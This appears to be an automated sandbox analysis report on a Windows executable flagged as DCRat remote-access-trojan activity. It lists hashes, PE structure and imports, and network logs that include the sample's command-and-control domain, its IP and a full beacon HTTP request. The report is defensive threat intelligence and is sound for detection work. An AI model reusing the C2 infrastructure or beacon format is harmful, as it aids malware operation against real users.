SHA-256:	A3B5778D53995872EFDFA756AE2C9298B58C44CCCB3DC867DAA5662A1E0C5594
SHA-512:	EE74686A5EDD4BFE6891C8B99A253D42C9A43AEBB824F3DB1D014051387EC8E080A8BE45414BF2A741A48FC257F939A14AE043F526A1EEC5080921F821AEA3AB
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 25/07/2024 15:48:40..15:48:40, error: 0x80072746.15:48:45, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.338729161467276
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LisectAVT_2403002A_442.exe
File size:	2'294'465 bytes
MD5:	519c9f6fedeb43a8d129230fed9a2108
SHA1:	534ce363aa81cba33e01330d449c081f6b5e4f87
SHA256:	2c9593138be6c386946e31595ccdd5550922ef3fdd843fbb5f1e83634c223a2a
SHA512:	ac8c10418e8ed4c2338378af4c8233196a2982405c551e033e0375c5abf523a552312b7c5664d1aed246e3177ac71c0ade7ecca3204ddb2cf1406ea055445521
SSDEEP:	49152:UbA30bEln+8YPyZc6wkQbPVqlC8m5saKHaFg3:UbUJ+lyZKjVJDWaA
TLSH:	93B5BE017A84CE12D16A163BC5EF805447BCFD016A66CB1A7FAF335D66533A25E0E2CB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41ec40
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007F919CF5EA39h
jmp 00007F919CF5E44Dh
cmp ecx, dword ptr [0043E668h]
jne 00007F919CF5E5C5h
ret
jmp 00007F919CF5EBBEh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F919CF51357h
mov dword ptr [esi], 00435580h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00435588h
mov dword ptr [ecx], 00435580h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00435568h
push eax
call 00007F919CF6175Dh
pop ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F919CF512EEh
push 0043B704h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F919CF60E72h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F919CF5E564h
push 0043B91Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F919CF60E55h
int3
jmp 00007F919CF62EA3h
jmp dword ptr [00433260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421EB0h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c820	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c854	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0xdfd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x2268	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3aac0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x35508	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3bdc4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x310ea	0x31200	c5bf61bbedb6ad471e9dc6266398e965	False	0.583959526081425	data	6.708075396341128	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xa612	0xa800	7980b588d5b28128a2f3c36cabe2ce98	False	0.45284598214285715	data	5.221742709250668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x23728	0x1000	201530c9e56f172adf2473053298d48f	False	0.36767578125	data	3.7088186669877685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x62000	0x188	0x200	c5d41d8f254f69e567595ab94266cfdc	False	0.4453125	data	3.2982538067961342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x63000	0xdfd0	0xe000	f6c0f34fae6331b50a7ad2efc4bfefdb	False	0.6370326450892857	data	6.6367506404157535	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x2268	0x2400	c7a942b723cb29d9c02f7c611b544b50	False	0.7681206597222222	data	6.5548620101740545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x63650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x64198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x65748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x65cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x66558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x67400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x67868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x68910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6aeb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x6f588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x6f358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x6f498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x6f228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6eef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6ec98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x6ff68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x70150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x70320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x704d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x70620	0x446	data	English	United States	0.340036563071298
RT_STRING	0x70a68	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x70bd0	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x70d28	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x70e38	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x70ef8	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6ec30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x6f810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T20:04:33.742524+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49719	80	192.168.2.9	141.8.197.42
2024-07-25T20:04:41.933578+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49721	80	192.168.2.9	141.8.197.42
2024-07-25T20:04:52.562535+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49723	13.85.23.86	192.168.2.9
2024-07-25T20:04:08.629608+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49708	80	192.168.2.9	141.8.197.42
2024-07-25T20:04:14.996897+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49712	13.85.23.86	192.168.2.9
2024-07-25T20:04:18.091116+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49715	80	192.168.2.9	141.8.197.42
2024-07-25T20:04:25.140282+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49717	80	192.168.2.9	141.8.197.42
2024-07-25T20:04:08.372160+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49707	80	192.168.2.9	141.8.197.42
2024-07-25T20:04:08.270891+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49706	80	192.168.2.9	141.8.197.42

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 20:04:07.570550919 CEST	49706	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:07.583621979 CEST	80	49706	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:07.583704948 CEST	49706	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:07.584820032 CEST	49706	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:07.595591068 CEST	80	49706	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:07.635581970 CEST	49707	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:07.647820950 CEST	80	49707	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:07.647897959 CEST	49707	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:07.648197889 CEST	49707	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:07.654860973 CEST	80	49707	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:07.946624994 CEST	49708	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:07.952069998 CEST	80	49708	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:07.952220917 CEST	49708	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:07.952518940 CEST	49708	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:07.959192038 CEST	80	49708	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.270562887 CEST	80	49706	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.270795107 CEST	80	49706	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.270890951 CEST	49706	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.283137083 CEST	49706	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.287950039 CEST	80	49706	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.293930054 CEST	49709	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.298914909 CEST	80	49709	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.299007893 CEST	49709	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.299228907 CEST	49709	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.304305077 CEST	80	49709	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.372046947 CEST	80	49707	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.372098923 CEST	80	49707	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.372159958 CEST	49707	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.374054909 CEST	49707	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.377531052 CEST	49710	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.378822088 CEST	80	49707	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.382958889 CEST	80	49710	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.383048058 CEST	49710	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.383152008 CEST	49710	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.388010979 CEST	80	49710	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.627377987 CEST	80	49708	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.629466057 CEST	80	49708	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.629607916 CEST	49708	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.629859924 CEST	49708	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.633085012 CEST	49711	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.634880066 CEST	80	49708	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.638102055 CEST	80	49711	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.638183117 CEST	49711	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.638432026 CEST	49711	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.644603014 CEST	80	49711	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.997185946 CEST	80	49709	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.997442007 CEST	80	49709	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:08.997499943 CEST	49709	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:08.997580051 CEST	49709	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:09.002773046 CEST	80	49709	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:09.058770895 CEST	80	49710	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:09.059123039 CEST	49710	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:09.060508013 CEST	80	49710	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:09.060556889 CEST	49710	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:09.063986063 CEST	80	49710	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:09.360966921 CEST	80	49711	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:09.361543894 CEST	80	49711	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:09.365056038 CEST	49711	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:09.631371975 CEST	49711	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:09.640018940 CEST	80	49711	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:17.091278076 CEST	49715	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:17.096106052 CEST	80	49715	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:17.096199036 CEST	49715	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:17.096529007 CEST	49715	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:17.101349115 CEST	80	49715	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:18.090177059 CEST	80	49715	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:18.090992928 CEST	80	49715	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:18.091015100 CEST	80	49715	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:18.091115952 CEST	49715	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:18.092525005 CEST	49715	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:18.094985008 CEST	49716	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:18.105515957 CEST	80	49715	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:18.105704069 CEST	49715	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:18.111823082 CEST	80	49715	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:18.112023115 CEST	80	49716	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:18.112358093 CEST	49716	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:18.112358093 CEST	49716	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:18.117357016 CEST	80	49716	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:18.857573032 CEST	80	49716	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:18.857585907 CEST	80	49716	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:18.857652903 CEST	49716	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:18.857891083 CEST	49716	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:18.863564014 CEST	80	49716	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:24.354355097 CEST	49717	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:24.359472036 CEST	80	49717	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:24.361090899 CEST	49717	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:24.361365080 CEST	49717	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:24.366894960 CEST	80	49717	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:25.139061928 CEST	80	49717	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:25.139632940 CEST	80	49717	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:25.140281916 CEST	49717	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:25.141346931 CEST	49717	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:25.141967058 CEST	80	49717	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:25.142133951 CEST	49717	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:25.144074917 CEST	49718	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:25.161439896 CEST	80	49717	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:25.162324905 CEST	80	49718	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:25.162471056 CEST	49718	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:25.162587881 CEST	49718	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:25.169538021 CEST	80	49718	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:25.944879055 CEST	80	49718	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:25.944890976 CEST	80	49718	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:25.944977999 CEST	80	49718	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:25.944991112 CEST	49718	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:25.945044041 CEST	49718	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:25.945338011 CEST	49718	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:25.964968920 CEST	80	49718	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:32.906527042 CEST	49719	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:32.912527084 CEST	80	49719	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:32.912609100 CEST	49719	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:32.912971973 CEST	49719	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:32.918350935 CEST	80	49719	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:33.740817070 CEST	80	49719	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:33.742441893 CEST	80	49719	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:33.742523909 CEST	49719	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:33.743022919 CEST	49719	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:33.746001005 CEST	49720	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:33.747838020 CEST	80	49719	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:33.751565933 CEST	80	49720	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:33.751658916 CEST	49720	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:33.751975060 CEST	49720	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:33.756716967 CEST	80	49720	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:35.503451109 CEST	80	49720	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:35.503459930 CEST	80	49720	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:35.503561974 CEST	49720	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:35.503796101 CEST	49720	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:35.512774944 CEST	80	49720	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:35.512851000 CEST	49720	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:35.530765057 CEST	80	49720	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:35.530827999 CEST	49720	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:35.531452894 CEST	80	49720	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:35.531538010 CEST	49720	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:35.560913086 CEST	80	49720	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:41.124953985 CEST	49721	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:41.130953074 CEST	80	49721	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:41.131016016 CEST	49721	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:41.131586075 CEST	49721	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:41.136662006 CEST	80	49721	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:41.933214903 CEST	80	49721	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:41.933223963 CEST	80	49721	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:41.933233023 CEST	80	49721	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:41.933578014 CEST	49721	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:41.935764074 CEST	49721	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:41.938322067 CEST	49722	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:41.971065998 CEST	80	49721	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:41.972105026 CEST	80	49722	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:41.972290993 CEST	49722	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:41.972640991 CEST	49722	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:41.988095045 CEST	80	49722	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:42.679048061 CEST	80	49722	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:42.679723978 CEST	49722	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:42.680450916 CEST	80	49722	141.8.197.42	192.168.2.9
Jul 25, 2024 20:04:42.680502892 CEST	49722	80	192.168.2.9	141.8.197.42
Jul 25, 2024 20:04:42.688220024 CEST	80	49722	141.8.197.42	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 20:04:07.257352114 CEST	51503	53	192.168.2.9	1.1.1.1
Jul 25, 2024 20:04:07.563950062 CEST	53	51503	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 20:04:07.257352114 CEST	192.168.2.9	1.1.1.1	0xb5f8	Standard query (0)	a0583448.xsph.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 20:04:07.563950062 CEST	1.1.1.1	192.168.2.9	0xb5f8	No error (0)	a0583448.xsph.ru		141.8.197.42	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

a0583448.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49706	141.8.197.42	80	8040	C:\Windows\System32\WWanAPI\dwm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:07.584820032 CEST	494	OUT	GET /HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Host: a0583448.xsph.ru Connection: Keep-Alive
